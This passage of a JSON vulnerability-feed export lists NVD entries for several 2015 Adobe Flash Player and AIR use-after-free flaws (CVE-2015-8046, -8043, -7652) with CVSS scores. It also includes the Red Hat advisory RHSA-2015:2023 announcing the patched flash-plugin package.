"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.261 and 19.x before 19.0.0.245 on Windows and OS X and before 11.2.202.548 on Linux, Adobe AIR before 19.0.0.241, Adobe AIR SDK before 19.0.0.241, and Adobe AIR SDK & Compiler before 19.0.0.241 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-7651, CVE-2015-7652, CVE-2015-7653, CVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663, CVE-2015-8042, CVE-2015-8043, and CVE-2015-8044.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "modified": "2017-09-10T01:29:00", "id": "CVE-2015-8046", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8046", "published": "2015-11-11T13:00:00", "title": "CVE-2015-8046", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.261 and 19.x before 19.0.0.245 on Windows and OS X and before 11.2.202.548 on Linux, Adobe AIR before 19.0.0.241, Adobe AIR SDK before 19.0.0.241, and Adobe AIR SDK & Compiler before 19.0.0.241 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-7651, CVE-2015-7652, CVE-2015-7653, CVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663, CVE-2015-8042, CVE-2015-8044, and CVE-2015-8046.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "modified": "2017-07-01T01:29:00", "id": "CVE-2015-8043", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8043", "published": "2015-11-11T13:00:00", "title": "CVE-2015-8043", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.261 and 19.x before 19.0.0.245 on Windows and OS X and before 11.2.202.548 on Linux, Adobe AIR before 19.0.0.241, Adobe AIR SDK before 19.0.0.241, and Adobe AIR SDK & Compiler before 19.0.0.241 allows attackers to execute arbitrary code via a crafted gridFitType property value, a different vulnerability than CVE-2015-7651, CVE-2015-7653, CVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657, CVE-2015-7658, CVE-2015-7660, CVE-2015-7661, CVE-2015-7663, CVE-2015-8042, CVE-2015-8043, CVE-2015-8044, and CVE-2015-8046.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "modified": "2017-09-10T01:29:00", "id": "CVE-2015-7652", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7652", "published": "2015-11-11T12:59:00", "title": "CVE-2015-7652", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-05-29T14:35:10", "bulletinFamily": "unix", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities, detailed in the Adobe Security Bulletin APSB15-28 listed\nin the References section, could allow an attacker to create a specially\ncrafted SWF file that would cause flash-plugin to crash, execute arbitrary\ncode, or disclose sensitive information when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-7651, CVE-2015-7652,\nCVE-2015-7653, CVE-2015-7654, CVE-2015-7655, CVE-2015-7656, CVE-2015-7657,\nCVE-2015-7658, CVE-2015-7659, CVE-2015-7660, CVE-2015-7661, CVE-2015-7662,\nCVE-2015-7663, CVE-2015-8042, CVE-2015-8043, CVE-2015-8044, CVE-2015-8046)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.548.\n", "modified": "2018-06-07T09:04:21", "published": "2015-11-11T05:00:00", "id": "RHSA-2015:2023", "href": "https://access.redhat.com/errata/RHSA-2015:2023", "type": "redhat", "title": "(RHSA-2015:2023) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}